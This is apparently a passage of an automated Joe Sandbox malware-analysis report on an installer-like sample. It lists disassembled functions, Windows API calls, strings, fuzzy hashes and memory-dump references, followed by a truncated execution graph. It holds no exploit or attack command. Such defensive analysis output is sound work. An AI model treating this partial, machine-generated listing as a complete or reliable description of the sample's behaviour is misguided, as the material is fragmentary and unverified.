                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                          Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                          • String ID: $@rD
                                                                                                          • API String ID: 3748168415-881980237
                                                                                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                          Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                          Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcatwsprintf
                                                                                                          • String ID: %02x%c$...
                                                                                                          • API String ID: 3065427908-1057055748
                                                                                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                          Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                          • API String ID: 2266616436-4211696005
                                                                                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                          Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1599320355-0
                                                                                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                          Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                          • String ID: Version
                                                                                                          • API String ID: 512980652-315105994
                                                                                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                          Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 2102729457-0
                                                                                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                          Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 2883127279-0
                                                                                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                          Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                                          • String ID: !N~
                                                                                                          • API String ID: 623250636-529124213
                                                                                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                          Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                          Strings
                                                                                                          • Error launching installer, xrefs: 00405C48
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                          • String ID: Error launching installer
                                                                                                          • API String ID: 3712363035-66219284
                                                                                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                          Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                          • API String ID: 3509786178-2769509956
                                                                                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                          Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 190613189-0
                                                                                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:4.4%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:2.5%
                                                                                                          Total number of Nodes:2000
                                                                                                          Total number of Limit Nodes:81
                                                                                                          execution_graph 98146 ea92c8 98147 ea92db 98146->98147 98148 ea92d5 98146->98148 98150 ea92ec 98147->98150 98151 e62f85 _free 58 API calls 98147->98151 98154 e62f85 98148->98154 98152 e62f85 _free 58 API calls 98150->98152 98153 ea92fe 98150->98153 98151->98150 98152->98153 98155 e62f8e RtlFreeHeap 98154->98155 98159 e62fb7 _free 98154->98159 98156 e62fa3 98155->98156 98155->98159 98160 e68d58 58 API calls __getptd_noexit 98156->98160 98158 e62fa9 GetLastError 98158->98159 98159->98147 98160->98158 98161 e41066 98162 e4106c 98161->98162 98165 e62f70 98162->98165 98168 e62e74 98165->98168 98167 e41076 98169 e62e80 __initptd 98168->98169 98176 e63447 98169->98176 98175 e62ea7 __initptd 98175->98167 98193 e69e3b 98176->98193 98178 e62e89 98179 e62eb8 DecodePointer DecodePointer 98178->98179 98180 e62e95 98179->98180 98181 e62ee5 98179->98181 98190 e62eb2 98180->98190 98181->98180 98232 e689d4 59 API calls __fclose_nolock 98181->98232 98183 e62f48 EncodePointer EncodePointer 98183->98180 98184 e62ef7 98184->98183 98186 e62f1c 98184->98186 98233 e68a94 61 API calls 2 library calls 98184->98233 98186->98180 98188 e62f36 EncodePointer 98186->98188 98234 e68a94 61 API calls 2 library calls 98186->98234 98188->98183 98189 e62f30 98189->98180 98189->98188 98235 e63450 98190->98235 98194 e69e5f EnterCriticalSection 98193->98194 98195 e69e4c 98193->98195 98194->98178 98200 e69ec3 98195->98200 98197 e69e52 98197->98194 98224 e632e5 58 API calls 3 library calls 98197->98224 98201 e69ecf __initptd 98200->98201 98202 e69ef0 98201->98202 98203 e69ed8 98201->98203 98211 e69f11 __initptd 98202->98211 98228 e68a4d 58 API calls 2 library calls 98202->98228 98225 e6a39b 58 API calls __NMSG_WRITE 98203->98225 98206 e69edd 98226 e6a3f8 58 API calls 4 library calls 98206->98226 98207 e69f05 98209 e69f0c 98207->98209 98210 e69f1b 98207->98210 98229 e68d58 58 API calls __getptd_noexit 98209->98229 98214 e69e3b __lock 58 API calls 98210->98214 98211->98197 98212 e69ee4 98227 e632cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98212->98227 98216 e69f22 98214->98216 98218 e69f47 98216->98218 98219 e69f2f 98216->98219 98221 e62f85 _free 58 API calls 98218->98221 98230 e6a05b InitializeCriticalSectionAndSpinCount 98219->98230 98222 e69f3b 98221->98222 98231 